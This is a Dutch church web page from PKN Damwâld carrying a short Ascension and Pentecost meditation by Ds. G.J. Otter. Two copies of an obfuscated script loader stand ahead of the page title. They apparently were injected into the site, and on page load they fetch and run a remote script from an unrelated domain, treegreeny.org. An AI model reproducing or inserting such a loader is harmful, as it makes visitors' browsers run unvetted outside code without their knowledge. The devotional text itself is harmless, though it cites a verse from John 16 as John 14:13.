;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hemelvaart en Pinksteren - PKN Damwâld

Hemelvaart en Pinksteren

Gepubliceerd op: vrijdag 7 mei 2021

In de komende weken vieren we twee belangrijke feesten: dat de Here Jezus naar de hemel ging en van daar de Heilige Geest zond. Juist dat Hij in de hemel is wordt Zijn vergeving bevestigd. “Wie zal … veroordelen? Christus Jezus, die gestorven is, meer nog, die is opgewekt en aan de rechterhand van God zit, pleit (bidt) voor ons” (Rom. 8 vers 34). Het anker van onze hoop en vergeving ligt bij Hem vast. Toch blijft de Here niet op afstand: Hij zendt de Geest. “Wanneer Die komt, de Geest van de waarheid, zal Hij u de weg wijzen in heel de waarheid, want Hij zal niet vanuit Zichzelf spreken, maar wat Hij gehoord zal hebben, zal Hij spreken, en de toekomstige dingen zal Hij u verkondigen. Die zal Mij verheerlijken, want Hij zal het uit het Mijne nemen en het u verkondigen” (Joh. 14 vers 13). Juist door de Geest worden we verbonden met de Here Jezus en mogen we van Hem ontvangen. Iedere dag opnieuw.

Ds. G.J. Otter